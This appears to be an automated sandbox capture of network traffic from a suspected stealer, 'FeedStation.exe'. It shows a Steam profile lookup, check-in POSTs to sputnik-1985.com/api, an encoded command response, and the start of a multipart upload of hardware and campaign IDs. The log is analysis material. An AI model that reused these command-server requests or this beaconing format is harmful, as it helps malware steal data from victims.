2025-01-10 10:59:14 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-10 10:59:14 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 10 Jan 2025 10:59:14 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=5c7a4220af3eb1b5130a8937; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 10:59:14 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 10:59:14 UTC	16384	IN	Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 10:59:14 UTC	3768	IN	Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 10:59:14 UTC	495	IN	Data Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 Data Ascii: criber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49783	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:15 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sputnik-1985.com
2025-01-10 10:59:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-10 10:59:15 UTC	1119	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0n7m1qqchj73tia5kqrmeoob9k; expires=Tue, 06 May 2025 04:45:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pdW6BbPTuh5T90unk6pr2r0UyquLyoAKHWPJaogN3AvkD4aMcPmThBKQ2ipzBHTPcPp5lP8VlkJzImF0DLULF59EFpPmamla59viYsrmGm51Svur%2BfKbBoPK788%2FB11wEzd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc28159a27424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1551&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1853968&cwnd=248&unsent_bytes=0&cid=9309341b258720f9&ts=447&x=0"
2025-01-10 10:59:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-10 10:59:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49791	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: sputnik-1985.com
2025-01-10 10:59:16 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 10:59:16 UTC	1125	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 10:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lf4gbgrs5bm6vv8c6srftmvtr6; expires=Tue, 06 May 2025 04:45:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UylMZJTlfAib29FLQiqI5qQvLLEjiuN539nVzEQjj%2Fjq1%2FdOx351NOjq650SE44YXoqf11Nsgn5veFg30YLH%2FBzp5sVdBz2YZSKtLi01wz5frLgWMQWTHuqeab0%2BGFkMhs%2FJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffc281bfb910f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1683&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=986&delivery_rate=1705607&cwnd=221&unsent_bytes=0&cid=a4565ee3d958a2c4&ts=461&x=0"
2025-01-10 10:59:16 UTC	244	IN	Data Raw: 34 33 30 63 0d 0a 72 70 50 44 39 69 4d 77 75 33 65 4e 44 69 59 67 36 71 35 71 6b 4c 33 75 6e 54 56 32 5a 2b 4f 6b 41 4c 68 6f 49 6e 6b 30 4f 6c 76 56 73 62 58 55 47 51 53 58 56 66 35 72 42 42 71 4d 7a 77 62 6a 32 4d 4b 2f 56 42 4a 46 32 63 4a 68 31 42 74 48 56 52 5a 4d 4e 6f 79 70 70 5a 64 50 51 39 35 62 72 32 74 65 41 74 44 31 45 62 4c 59 67 4c 38 50 56 41 4b 4a 78 6d 48 55 43 6b 4d 53 57 30 6f 33 7a 66 75 76 6b 55 74 56 32 42 50 73 59 6b 74 46 6a 38 73 4c 2b 74 4f 48 38 46 30 62 52 63 2b 47 5a 63 4a 4b 47 46 74 35 58 79 2f 50 33 71 4b 46 53 42 4c 47 57 2f 59 73 51 30 37 49 6c 45 6a 78 32 49 7a 78 55 78 49 4d 69 38 78 6f 33 41 74 47 45 30 52 54 50 63 62 37 6f 5a 4a 4b 58 39 45 48 34 57 68 4d 54 6f 6e 42 43 37 4b 52 7a 50 Data Ascii: 430crpPD9iMwu3eNDiYg6q5qkL3unTV2Z+OkALhoInk0OlvVsbXUGQSXVf5rBBqMzwbj2MK/VBJF2cJh1BtHVRZMNoyppZdPQ95br2teAtD1EbLYgL8PVAKJxmHUCkMSW0o3zfuvkUtV2BPsYktFj8sL+tOH8F0bRc+GZcJKGFt5Xy/P3qKFSBLGW/YsQ07IlEjx2IzxUxIMi8xo3AtGE0RTPcb7oZJKX9EH4WhMTonBC7KRzP
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 68 50 56 46 33 42 6c 56 44 5a 47 31 45 4f 57 30 67 2f 6a 4f 37 76 6a 51 46 56 31 56 57 33 4c 45 78 4f 68 73 6b 4c 2f 64 69 4e 2f 30 55 62 42 59 4c 4f 61 74 34 41 54 78 52 5a 56 6a 50 4c 2b 61 69 54 54 6c 58 52 45 2b 42 76 42 41 7a 49 79 78 43 79 68 38 7a 66 52 78 63 47 6c 63 74 7a 6d 68 55 4f 41 68 5a 66 4e 59 79 70 34 5a 4a 50 55 39 51 56 2f 57 52 50 53 59 33 65 41 2f 76 53 67 66 39 61 48 67 71 43 78 6d 58 51 41 45 38 52 55 6c 55 30 79 76 47 68 31 41 38 53 33 67 32 76 4e 41 52 68 6a 64 77 50 2f 73 6e 4f 78 52 63 4c 53 35 69 47 5a 64 5a 4b 47 46 74 65 58 54 72 50 2b 71 36 58 53 56 6e 4c 46 66 31 71 53 55 65 61 79 67 33 38 31 59 2f 74 58 52 6f 44 67 73 39 70 30 77 39 48 48 78 59 57 65 63 76 70 34 63 77 42 63 39 51 65 34 32 5a 54 51 73 6a 54 52 75 75 66 69 Data Ascii: hPVF3BlVDZG1EOW0g/jO7vjQFV1VW3LExOhskL/diN/0UbBYLOat4ATxRZVjPL+aiTTlXRE+BvBAzIyxCyh8zfRxcGlctzmhUOAhZfNYyp4ZJPU9QV/WRPSY3eA/vSgf9aHgqCxmXQAE8RUlU0yvGh1A8S3g2vNARhjdwP/snOxRcLS5iGZdZKGFteXTrP+q6XSVnLFf1qSUeayg381Y/tXRoDgs9p0w9HHxYWecvp4cwBc9Qe42ZTQsjTRuufi
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 41 67 4d 78 6f 6d 6b 51 41 48 45 34 59 59 59 7a 41 74 70 38 44 5a 39 6f 62 34 57 74 53 41 70 65 43 45 62 4c 59 67 4c 38 50 56 41 69 4a 77 32 66 56 43 30 6f 56 55 31 49 31 78 50 2b 69 68 6b 35 57 32 52 6e 6e 5a 6b 6c 4d 6a 4d 51 42 2b 64 53 4b 2f 31 59 65 52 63 2b 47 5a 63 4a 4b 47 46 74 69 58 7a 58 42 2f 75 4f 68 51 6c 7a 58 45 76 6b 73 57 77 79 52 6a 41 2f 2b 6e 39 53 2f 57 78 30 46 69 73 78 6d 32 67 31 4e 48 6c 56 66 4f 73 48 32 71 35 70 47 56 74 55 63 34 6d 70 45 52 59 7a 4a 47 76 66 57 67 50 4d 58 57 6b 57 47 33 69 4b 43 53 6d 38 63 51 46 73 57 7a 2b 43 6f 31 46 34 63 77 46 58 6f 59 41 51 61 79 4d 73 4e 2b 74 53 4b 39 31 63 47 41 49 2f 4e 59 39 41 4d 51 52 5a 61 58 6a 6e 4e 38 61 65 59 51 56 58 65 42 2f 31 70 51 6c 43 43 6a 45 61 79 32 4a 53 2f 44 31 Data Ascii: AgMxomkQAHE4YYYzAtp8DZ9ob4WtSApeCEbLYgL8PVAiJw2fVC0oVU1I1xP+ihk5W2RnnZklMjMQB+dSK/1YeRc+GZcJKGFtiXzXB/uOhQlzXEvksWwyRjA/+n9S/Wx0Fisxm2g1NHlVfOsH2q5pGVtUc4mpERYzJGvfWgPMXWkWG3iKCSm8cQFsWz+Co1F4cwFXoYAQayMsN+tSK91cGAI/NY9AMQRZaXjnN8aeYQVXeB/1pQlCCjEay2JS/D1
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 4f 70 6f 4a 54 78 4a 5a 55 44 48 44 2f 71 57 61 52 31 54 55 45 4f 42 6d 56 6b 71 47 77 51 50 39 31 4a 37 2f 57 68 41 4a 68 63 35 70 30 45 6f 4f 57 31 46 41 65 5a 53 78 6c 4a 6c 4f 55 74 6f 44 72 33 4d 4b 57 38 6a 4c 42 4c 4b 48 7a 50 4e 5a 46 41 71 4e 79 6d 6e 53 43 30 77 56 55 56 30 77 78 50 6d 7a 6c 55 56 61 32 42 76 67 62 55 42 48 6a 63 67 50 39 74 6d 44 76 78 6c 55 41 70 6d 47 4f 70 6f 6c 5a 79 34 55 65 51 4f 4d 37 75 2b 4e 41 56 58 56 56 62 63 73 53 45 47 45 78 41 66 30 31 6f 44 31 58 68 38 4a 69 73 4a 75 30 77 39 47 47 6c 4e 64 4f 4d 6a 39 71 35 4a 43 55 64 59 61 34 47 51 45 44 4d 6a 4c 45 4c 4b 48 7a 4e 70 41 48 77 75 48 68 6e 32 55 45 77 41 63 57 68 68 68 6a 50 32 6f 6b 6b 64 58 31 52 54 70 5a 45 46 4b 6a 4d 30 4f 39 4e 79 44 2b 31 49 56 43 6f 58 Data Ascii: OpoJTxJZUDHD/qWaR1TUEOBmVkqGwQP91J7/WhAJhc5p0EoOW1FAeZSxlJlOUtoDr3MKW8jLBLKHzPNZFAqNymnSC0wVUV0wxPmzlUVa2BvgbUBHjcgP9tmDvxlUApmGOpolZy4UeQOM7u+NAVXVVbcsSEGExAf01oD1Xh8JisJu0w9GGlNdOMj9q5JCUdYa4GQEDMjLELKHzNpAHwuHhn2UEwAcWhhhjP2okkdX1RTpZEFKjM0O9NyD+1IVCoX
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 56 49 61 57 31 4d 72 79 2f 36 6c 6b 30 31 55 31 68 50 75 61 55 35 4f 6a 38 6b 44 2f 64 50 4d 73 52 63 54 48 63 47 65 49 76 51 42 55 77 78 56 56 6a 4c 61 36 75 47 4c 44 30 75 5a 45 75 4d 73 48 41 4b 4c 78 77 50 32 33 34 44 2f 55 78 6b 46 6b 38 6c 6c 33 51 4e 4c 43 56 78 66 50 73 66 35 71 70 74 48 51 4e 55 62 2f 57 6c 57 55 4d 69 43 53 50 58 48 7a 4b 63 58 49 67 4b 52 31 6d 47 59 4f 31 59 59 51 46 4d 30 77 4c 47 2b 32 6c 67 53 33 68 6d 76 4e 41 52 45 68 38 55 4c 2f 64 36 46 38 31 6f 52 44 49 54 48 5a 4e 34 41 53 68 74 51 58 6a 6a 4a 2b 36 4b 56 53 31 76 65 48 65 68 76 56 67 4c 47 6a 41 2f 71 6e 39 53 2f 66 68 4d 58 6a 39 59 69 78 55 52 5a 57 31 46 55 65 5a 53 78 70 5a 35 4f 56 74 34 5a 36 57 6c 43 54 34 6e 44 43 66 4c 51 69 50 52 65 45 67 53 4d 77 32 2f 65 Data Ascii: VIaW1Mry/6lk01U1hPuaU5Oj8kD/dPMsRcTHcGeIvQBUwxVVjLa6uGLD0uZEuMsHAKLxwP234D/UxkFk8ll3QNLCVxfPsf5qptHQNUb/WlWUMiCSPXHzKcXIgKR1mGYO1YYQFM0wLG+2lgS3hmvNAREh8UL/d6F81oRDITHZN4AShtQXjjJ+6KVS1veHehvVgLGjA/qn9S/fhMXj9YixURZW1FUeZSxpZ5OVt4Z6WlCT4nDCfLQiPReEgSMw2/e
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 6f 59 59 59 7a 78 71 35 46 4c 58 39 6f 61 37 48 35 46 52 4a 72 4d 42 66 6a 4e 68 76 52 53 47 51 69 4d 78 57 54 63 41 55 77 4a 58 31 67 36 78 37 48 76 31 45 5a 4b 6d 55 32 76 54 31 4e 55 67 73 73 45 35 4e 53 4e 2f 45 45 5a 46 63 47 49 49 73 73 4e 55 56 73 4f 54 69 6e 62 39 72 37 61 57 42 4c 65 47 61 38 30 42 45 53 42 79 67 2f 30 30 5a 37 36 55 52 73 4b 69 4d 39 6d 30 67 6c 41 48 31 4a 66 50 4d 2f 39 71 70 4e 43 58 64 30 63 34 57 56 4c 41 73 61 4d 44 2b 71 66 31 4c 39 32 44 77 61 4e 79 79 4c 46 52 46 6c 62 55 56 52 35 6c 4c 47 74 6d 6b 52 53 30 78 50 72 61 55 4a 49 6a 63 77 44 38 64 43 49 2b 56 4d 62 42 59 72 50 59 39 77 50 53 68 42 51 56 54 72 4b 39 2b 48 61 41 56 58 42 56 62 63 73 5a 46 6d 46 77 41 2b 79 77 4d 4c 6d 46 78 4d 4a 77 5a 34 69 30 51 5a 45 48 Data Ascii: oYYYzxq5FLX9oa7H5FRJrMBfjNhvRSGQiMxWTcAUwJX1g6x7Hv1EZKmU2vT1NUgssE5NSN/EEZFcGIIssNUVsOTinb9r7aWBLeGa80BESByg/00Z76URsKiM9m0glAH1JfPM/9qpNCXd0c4WVLAsaMD+qf1L92DwaNyyLFRFlbUVR5lLGtmkRS0xPraUJIjcwD8dCI+VMbBYrPY9wPShBQVTrK9+HaAVXBVbcsZFmFwA+ywMLmFxMJwZ4i0QZEH
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 31 73 61 69 54 57 6b 50 50 47 50 39 72 42 48 33 47 6a 42 43 79 68 38 7a 4b 56 42 6f 4c 68 74 42 7a 6c 79 31 57 45 56 46 49 50 74 76 2b 34 64 6f 42 56 4a 6c 4e 76 43 49 45 52 70 6d 4d 55 4b 4b 4e 31 36 6f 45 51 31 58 54 32 53 7a 44 53 6c 5a 62 44 67 70 33 6a 4f 50 68 7a 41 45 56 32 67 66 39 61 6b 64 55 69 34 73 32 7a 50 69 57 38 6c 45 44 46 4c 2f 34 5a 63 41 48 52 67 78 48 46 43 7a 50 2f 36 2b 54 56 78 4b 58 56 65 41 73 48 48 76 49 68 45 6a 4e 6b 63 7a 6e 46 30 78 46 74 4d 56 73 31 41 31 57 43 68 74 2f 49 38 48 33 74 6f 55 42 48 4a 6b 54 72 7a 51 55 44 4d 6a 49 47 62 4b 48 33 4b 30 4d 51 56 62 57 6c 6a 44 46 52 46 6c 62 51 42 68 68 6e 72 2f 68 68 67 45 4b 6d 56 4c 73 66 6c 5a 45 69 39 6f 4c 74 65 47 79 30 56 41 53 41 49 62 57 49 50 51 42 56 42 77 57 46 6e Data Ascii: 1saiTWkPPGP9rBH3GjBCyh8zKVBoLhtBzly1WEVFIPtv+4doBVJlNvCIERpmMUKKN16oEQ1XT2SzDSlZbDgp3jOPhzAEV2gf9akdUi4s2zPiW8lEDFL/4ZcAHRgxHFCzP/6+TVxKXVeAsHHvIhEjNkcznF0xFtMVs1A1WCht/I8H3toUBHJkTrzQUDMjIGbKH3K0MQVbWljDFRFlbQBhhnr/hhgEKmVLsflZEi9oLteGy0VASAIbWIPQBVBwWFn
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 67 30 34 53 6c 31 58 70 4c 42 77 51 78 6f 77 4d 34 35 2f 55 72 77 56 50 55 4e 4b 52 4d 6f 67 56 44 67 49 57 54 6e 6d 55 6f 2b 2f 55 55 78 4b 42 56 61 68 76 56 6c 43 4f 7a 78 37 78 6d 4c 4c 42 63 42 6f 43 67 4e 42 79 7a 51 55 50 4e 57 42 35 42 2f 4c 6b 6f 70 70 50 56 63 38 45 72 79 49 45 54 63 69 55 4d 62 4b 58 7a 4d 41 5a 56 42 33 42 6e 69 4c 76 43 55 34 56 55 55 34 6f 67 64 61 76 6b 30 42 45 79 51 4c 67 49 32 70 30 71 59 78 47 73 74 6e 4d 70 77 56 61 52 59 58 58 49 6f 4a 61 45 6b 41 44 43 32 36 63 6f 37 37 61 57 42 4c 50 56 62 63 2b 43 67 4b 61 6a 46 43 79 6d 49 2f 74 52 52 49 47 6c 38 55 6c 35 44 52 6e 46 56 46 5a 4c 39 7a 38 72 62 56 43 51 39 4d 72 30 58 6c 48 54 49 62 4c 48 75 4f 66 77 72 39 59 56 46 32 34 68 69 71 61 4e 51 35 62 54 68 68 68 6a 4d 53 Data Ascii: g04Sl1XpLBwQxowM45/UrwVPUNKRMogVDgIWTnmUo+/UUxKBVahvVlCOzx7xmLLBcBoCgNByzQUPNWB5B/LkoppPVc8EryIETciUMbKXzMAZVB3BniLvCU4VUU4ogdavk0BEyQLgI2p0qYxGstnMpwVaRYXXIoJaEkADC26co77aWBLPVbc+CgKajFCymI/tRRIGl8Ul5DRnFVFZL9z8rbVCQ9Mr0XlHTIbLHuOfwr9YVF24hiqaNQ5bThhhjMS
2025-01-10 10:59:16 UTC	1369	IN	Data Raw: 39 30 44 2b 6d 39 55 52 62 62 79 4a 65 44 59 6e 50 77 56 4f 41 4b 4d 79 6c 7a 6b 50 56 45 63 52 68 6f 66 7a 2b 65 69 31 41 38 53 77 56 57 33 4c 47 6c 51 6a 39 77 4c 73 50 4f 4c 38 6c 74 55 47 73 2f 66 49 73 78 4b 47 45 67 59 47 43 75 4d 71 65 48 54 51 6b 44 4c 45 2b 78 36 52 77 57 32 38 69 58 67 32 4a 7a 38 46 53 55 49 68 64 42 33 32 52 70 48 4a 57 68 31 4b 38 76 68 6f 74 5a 6b 61 4a 73 6b 2b 57 39 45 54 49 2b 4d 52 72 4c 48 7a 4b 63 58 4f 52 65 47 31 6d 47 59 4c 33 70 5a 5a 30 34 36 7a 50 2b 6d 31 41 38 53 31 56 57 33 4c 45 6c 51 6a 39 77 4c 76 74 69 57 2b 42 63 4c 53 35 69 47 64 4a 70 53 45 31 55 57 53 6e 6d 55 73 65 61 61 54 46 50 61 47 2b 78 2b 56 6b 53 4c 32 67 75 31 34 62 4c 51 58 42 55 56 6a 4e 64 76 33 68 78 2b 4a 58 46 65 50 4d 76 50 6e 36 4e 51 Data Ascii: 90D+m9URbbyJeDYnPwVOAKMylzkPVEcRhofz+ei1A8SwVW3LGlQj9wLsPOL8ltUGs/fIsxKGEgYGCuMqeHTQkDLE+x6RwW28iXg2Jz8FSUIhdB32RpHJWh1K8vhotZkaJsk+W9ETI+MRrLHzKcXOReG1mGYL3pZZ046zP+m1A8S1VW3LElQj9wLvtiW+BcLS5iGdJpSE1UWSnmUseaaTFPaG+x+VkSL2gu14bLQXBUVjNdv3hx+JXFePMvPn6NQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49801	104.21.112.1	443	6416	C:\Users\user\Desktop\FeedStation.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 10:59:17 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4PJXJRFRQIXUO72KPW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12842 Host: sputnik-1985.com
2025-01-10 10:59:17 UTC	12842	OUT	Data Raw: 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 50 4a 58 4a 52 46 52 51 49 58 55 4f 37 32 4b 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 Data Ascii: --4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="pid"2--4PJXJRFRQIXUO72KPWContent-Disposition: form-data; name="lid"HpOoIh--3fe7f
